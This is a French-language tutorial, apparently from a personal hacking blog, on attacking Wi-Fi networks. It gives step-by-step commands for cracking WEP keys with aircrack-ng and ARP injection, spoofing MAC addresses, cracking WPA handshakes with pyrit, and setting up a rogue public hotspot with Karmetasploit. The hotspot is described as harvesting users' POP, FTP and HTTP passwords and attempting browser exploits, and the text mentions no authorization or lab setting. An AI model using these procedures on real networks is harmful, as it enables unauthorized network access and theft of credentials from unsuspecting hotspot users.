Bebzounette
Rechercher

WIFI

1. Cracker un réseau WEP

Aircrack est la suite qui permet de craquer les réseaux Wi-Fi.
Installation sous Debian de aircrack-ng :
udo apt install aircrack-ng

a. Capturer des paquets

Afin de cracker la clé WEP, on va devoir capturer suffisamment de paquets.
Pour connaĂźtre le nom de votre interface, utilisons la commande ifconfig :
airodump-ng --write capture1 wlan0
Airodump vous permet de capturer les paquets Wi-Fi.
Afin d’optimiser au maximum la capture, on peut spĂ©cifier un canal, via l’option --channel, l’adresse MAC de la borne Wi-Fi : --bssid.

b. Générer du trafic

Pour cracker la clĂ©, il faut Ă©normĂ©ment de paquets, 400 000 au moins pour une WEP 64 et 1 200 000 au moins pour une WEP 128. S’il n’y a personne sur le rĂ©seau, cela peut prendre des semaines.
On va devoir injecter du trafic pour arriver Ă  rĂ©cupĂ©rĂ© assez de requete (cette opĂ©ration est optionnelle, mais permet d’accĂ©lĂ©rer le process s’il n’y a pas ou trĂšs peu de trafic).
Votre carte doit donc accepter le mode injection, vous pouvez voir la liste de compatibilitĂ© sur le site d’aircrack : http://www.aircrack-ng.org​
Aireplay permet d’effectuer plusieurs attaques :
  • -0 : dĂ© authentification, dĂ©connecte les clients
  • -1 : fausse authentification
  • -2 : rĂ©injection de paquet
  • -3 : injection de requĂȘte ARP
  • -4 : attaque ChopChop
  • -5 : attaque par fragmentation
  • -6 : Caffe Latte
  • -7 : Cfrag
  • -z : PTW attack
​
Dans un premier temps, on va générer une fausse authentification :
aireplay-ng -1 0 -e ACISSI -a 00:11:22:33:44:55 -h 00:00:00:00:00:01 wlan0
On va gĂ©nĂ©rer une attaque de type injection de requĂȘte ARP :
aireplay-ng -3 -e ACISSI -b 00:11:22:33:44:55 -h 00:00:00:00:00:01 wlan0
Dùs qu’Aireplay injectera des paquets, on va pouvoir voir une nette augmentation dans Airodump.

c. Trouver la clé

Lançons Aircrack via la commande :
aircrack-ng capture1.cap
Si Aircrack ne trouve pas la clé, il faut capturer plus de paquets puis relancer Aircrack.
Si le filtrage MAC est activĂ©, il suffit d’installer macchanger, via la commande :
apt-get install macchanger
Pour changer votre adresse MAC :
macchanger -m 00:00:00:00:00:01 wlan0
https://github.com/Zeckers/LeDicoDuGreyHat/blob/master/Programme/MacChanger/MacChanger.pyVous pouvez aussi utilisé mon programme en python qui change aléatoirement votre adresse MAC

2. Cracker un réseau WPA

Avant de vous expliquer comment tout cela marche voici un outils qui permet de faire toutes les étapes que je vais vous présenter automatiquement :
https://github.com/v1s1t0r1sh3r3/airgeddon
Le crack WPA est bien moins avancé que le WEP. Cependant, il est possible de casser un mot de passe en utilisant un dictionnaire.
Nous allons utiliser pyrit, un programme en Python qui a le mĂ©rite de pouvoir ĂȘtre utilisĂ© en cluster et permet aussi d’utiliser la puissance des GPU.
Téléchargeons les sources de pyrit via svn :
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit
Puis les outils pour la compilation :
sudo apt-get install libssl-dev python python-dev
Compilons et installons pyrit :
python setup.py build
sudo python setup.py install
Nous allons commencer par importer la liste de clés candidates dans une base de données pyrit :
pyrit -i dict.gz import_passwords
Nous allons maintenant importer les diffĂ©rents ESSID, par exemple l’ESSID linksys :
pyrit -e linksys create_essid
La commande suivante combine les mots de passe avec les différents ESSID afin de générer des PMK candidats :
pyrit batch
Cette procédure est la plus longue, en effet elle génÚre les différents PMK par produit cartésien (clé, ESSID).
Procédons à une capture avec airodump afin de récupérer un fichier .cap :
airodump-ng --write wpapskcapture.cap wlan0.
Il ne reste plus qu’à cracker :
pyrit -r wpapskcapture.cap attack_db
Il est aussi possible d'utiliser uniquement airodump et de capturer le handshake et ensuite de lancer un logiciel de cassage de mot de passe dessus sans utiliser pyrit.

3. Rogue AP

a. Introduction au Rogue AP

S’il est complexe de cracker une clĂ© WPA, il est dĂ©jĂ  bien plus simple de profiter de la nouvelle vague de rogue Access Point afin d’en crĂ©er un.
Les AP sont des routeurs Wi-Fi permettant aux utilisateurs de disposer d’une connexion Internet. On les trouve donc partout, dans la plupart des fastfoods, les universitĂ©s, les parcs et autres. Ce sont des wifi publics.
Un AP n’a pas de clĂ© WEP ou WPA et la majoritĂ© des utilisateurs tentent de s’y connecter pour accĂ©der Ă  Internet gratuitement.
Les rogues AP sont donc des faux « routeurs Wi-Fi », en gĂ©nĂ©ral hotspot, qui rĂ©cupĂ©reront un maximum de mots de passe et si possible tenteront d’installer une backdoor sur les ordinateurs.
Comme il est possible de voir les clients connectĂ©s via la suite aicrack mais aussi d’authentifier un client, il est possible de les rediriger vers le Rogue AP.

b. Mise en pratique d’un Rogue AP avec Karmetasploit

Nous avons dans un premier temps besoin d’installer un serveur DHCP qui permettra de configurer automatiquement les IP des clients comme un vrai routeur Wi-Fi.
apt-get install dhcp3-server
Voici la configuration du serveur DHCP : /etc/dhcp3/dhcpd.conf
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}
On passe l’interface Wi-Fi en mode moniteur :
airmon-ng start wlan0
Nous allons maintenant créer le hotspot :
airbase-ng -P -C 30 -e "Hotspot WiFi" -v mon0
-e est l’ESSID du rĂ©seau, il est possible de personnaliser le canal Wi-Fi, et mĂȘme l’adresse MAC de l’AP.
Il faut maintenant configurer une adresse IP fixe pour notre AP.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
Nous pouvons dÚs à présent démarrer le serveur DHCP.
/etc/init.d/dhcp3-server restart
Nous avons jusqu’ici crĂ©Ă© un AP fonctionnel qui permet de surfer sur le Net. Nous allons maintenant crĂ©er la partie rogue.
Pour ce faire, nous allons utiliser Karmetasploit qui est en fait l’association de Karma et Metasploit.
Récupérons la derniÚre version de Metasploit via la commande :
svn co http://metasploit.com/svn/framework3/trunk msf3
Téléchargeons karma.rc.
wget http://digitaloffense.net/tools/karma.rc
Il ne reste plus qu’à lancer Karmetasploit :
./msfconsole -r karma.rc
Utilisons un de vos PC pour vous connecter sur votre Rogue AP. Une fois connecté, allez sur internet.
La Rogue AP dans cette configuration cherchera à infecter votre machine via autoPWN, un serveur HTTP qui va tenter un exploit sur votre navigateur Web. Karmetasploit est aussi configuré pour récupérer les mots de passe POP, FTP, HTTP.
Tout ce qui se passe est enregistré dans un fichier cap, analysable par la suite via Wireshark, mais aussi dans la base de données SQLite karma.db.

3. Autre Rogue AP :

WIFI-PUMPKIN : LE MEILLEUR OUTIL DE ROGUE AP